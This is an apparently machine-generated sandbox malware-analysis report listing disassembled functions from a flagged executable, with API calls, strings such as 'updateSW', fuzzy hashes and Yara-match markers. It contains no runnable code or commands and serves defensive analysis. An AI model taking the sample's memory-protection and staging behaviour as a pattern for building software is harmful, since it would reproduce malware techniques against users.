WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B68206
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B682B2

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
Instruction ID: 4a25b31541ed0933b02c805444c1992ee2f1c37b1302585632ba1bace276fde5
Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
Instruction Fuzzy Hash: 56D1BB71E026589FCF15DFE8C8809EDBBB5FF48304F2801AAE816BB241D635A946CF50

Function 00417CD3 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
__fassign.LIBCMT ref: 00417EFA
__fassign.LIBCMT ref: 00417F17
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58

Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
__fassign.LIBCMT ref: 1000B905
__fassign.LIBCMT ref: 1000B922
WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60

Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244

Function 04B5B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,04B5B002,04B5A5C6,04B59C00), ref: 04B5B019
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B5B027
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B5B040
SetLastError.KERNEL32(00000000,04B5B002,04B5A5C6,04B59C00), ref: 04B5B092

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: a22d7a9d761b21adbc66d7f6a5c9090f1c3ecbbf37cb90f7878395ae85dfe3c7
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction Fuzzy Hash: 6301A73270D3116FBB347FB87C84B66AB55EB016B872402BAFD24560F1EF5A78126548

Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E

Function 04B66383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\BEd2lJRXFM.exe, xrefs: 04B66388

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\BEd2lJRXFM.exe
API String ID: 0-1817753410
Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
Instruction ID: 20d8bfed093e877acf24d1604739c063d5bc26a8a21b0f918cd9d06d16735a23
Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
Instruction Fuzzy Hash: 0521C6B2600205BFEB20AF6A9C81D7BB7ADEF442A87108594FD2BD7150E735FC4187A1

Function 0040BE17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7

Strings

api-ms-, xrefs: 0040BE67

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD

Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5

Strings

CorExitProcess, xrefs: 10005FCA
mscoree.dll, xrefs: 10005FB8

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90

Function 0040EF4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF64
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,74DEDF80,?), ref: 0040EF9A

Strings

CorExitProcess, xrefs: 0040EF6F
mscoree.dll, xrefs: 0040EF5D

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98

Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
__alloca_probe_16.LIBCMT ref: 1000A736
__alloca_probe_16.LIBCMT ref: 1000A7CC
__freea.LIBCMT ref: 1000A837
__freea.LIBCMT ref: 1000A843

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0

Function 04D12AA0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 04D12B24
__alloca_probe_16.LIBCMT ref: 04D12BEA
__freea.LIBCMT ref: 04D12C56
__freea.LIBCMT ref: 04D12C5F
__freea.LIBCMT ref: 04D12C82

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID:
API String ID: 3509577899-0
Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
Instruction ID: b25de5fbf0861ff6f32bce70894ab86a37678d9295d2bf5656f98d99cdb5a9c2
Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
Instruction Fuzzy Hash: A551C172700246BBEB245E64AC81FBB36AAEF84754F1541A9FE04F7160E732FC5196A0

Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 1000B03B
__alloca_probe_16.LIBCMT ref: 1000B101
__freea.LIBCMT ref: 1000B16D

Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

__freea.LIBCMT ref: 1000B176
__freea.LIBCMT ref: 1000B199

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0

Function 004136A0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00413724
__alloca_probe_16.LIBCMT ref: 004137EA
__freea.LIBCMT ref: 00413856

Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0

__freea.LIBCMT ref: 0041385F
__freea.LIBCMT ref: 00413882

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8

Function 04B52BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 04B52C5F
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B52C74
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B52C82
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B52C9D
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B52CBC

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
String ID:
API String ID: 2509773233-0
Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
Instruction ID: 4fc65d6fc8a03ccf041c994ef5565c75c86e65851c9642f631fa0b0619b67ef5
Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
Instruction Fuzzy Hash: 59312471B01014AFDB08EF68DC40FAAB778EF48304F0541E9ED05EB262CB31A912CB94

Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 100029C3
dllmain_crt_dispatch.LIBCMT ref: 100029DA
dllmain_raw.LIBCMT ref: 10002A22
dllmain_crt_dispatch.LIBCMT ref: 10002A35
dllmain_raw.LIBCMT ref: 10002A48

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1

Function 04D163E1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D163F9
_free.LIBCMT ref: 04D1640B
_free.LIBCMT ref: 04D1641D
_free.LIBCMT ref: 04D1642F
_free.LIBCMT ref: 04D16441

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction ID: fadb30e9e11332abe34e42c4b409b48c0acfb3ca8b2eaa97aef6f70e6d578de2
Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction Fuzzy Hash: D8F06272705210B78625EF5DF9C6C2673D9FB00720BA48819FC08D7922CB35F8918665

Function 04B67248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 04B67260

Part of subcall function 04B61D29: HeapFree.KERNEL32(00000000,00000000,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?), ref: 04B61D3F
Part of subcall function 04B61D29: GetLastError.KERNEL32(?,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?,?), ref: 04B61D51

_free.LIBCMT ref: 04B67272
_free.LIBCMT ref: 04B67284
_free.LIBCMT ref: 04B67296
_free.LIBCMT ref: 04B672A8

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction ID: 3bd1fd97e653c7c93c176adc087a0a1db0c57e468ce2c75ad3a020cf4e7c3569
Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction Fuzzy Hash: 86F06232614214BB8A34EB6CF986C2673EDFB01724BA40895F51AD7504CF3CFC914A64

Function 00416FE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00416FF9

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 0041700B
_free.LIBCMT ref: 0041701D
_free.LIBCMT ref: 0041702F
_free.LIBCMT ref: 00417041

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C

Function 04B558D0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON

Download Yara Rule

Strings

rB, xrefs: 04B56527
rB, xrefs: 04B559EE
O*, xrefs: 04B55A5F

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: O*$rB$rB
API String ID: 0-546290271
Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
Instruction ID: 99cb01f746eb7b7e86607f816457fd652bf91f34b7f8d3e344da72a93b4e844a
Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
Instruction Fuzzy Hash: 1A12CF71D012489BEB19EBB8DC54BEEF774AF54308F5080E8D805671A1EB34BA49CFA1

Function 04B5516B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04B593D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B593E2
Part of subcall function 04B593D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B5941F

__Init_thread_footer.LIBCMT ref: 04B551B2

Part of subcall function 04B5938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B59397
Part of subcall function 04B5938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B593CA

Sleep.KERNEL32(000007D0), ref: 04B5552A
Sleep.KERNEL32(000007D0), ref: 04B55544

Strings

updateSW, xrefs: 04B5544F

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
String ID: updateSW
API String ID: 500923978-2484434887
Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
Instruction ID: dcf0138a4b6712d066d61a73c1751368042895238e92c1c8cd299839a1203e44
Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
Instruction Fuzzy Hash: F9D1D671A001649BEB29EB28CC8879DF771EF81309F5441E9DC096B2A5DB75AEC4CF81

Function 04D11C22 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04D11CA9

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction ID: ba11a2a9c9af2f47868fe5736438ab9c67396745c4f17c3b38101dc148863e2d
Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction Fuzzy Hash: 57B15C72A00246BFEB11CF64E8807EEBBF5FF49350F14456ADE519B351D634A902CB60

Function 04B62A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04B62B10

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

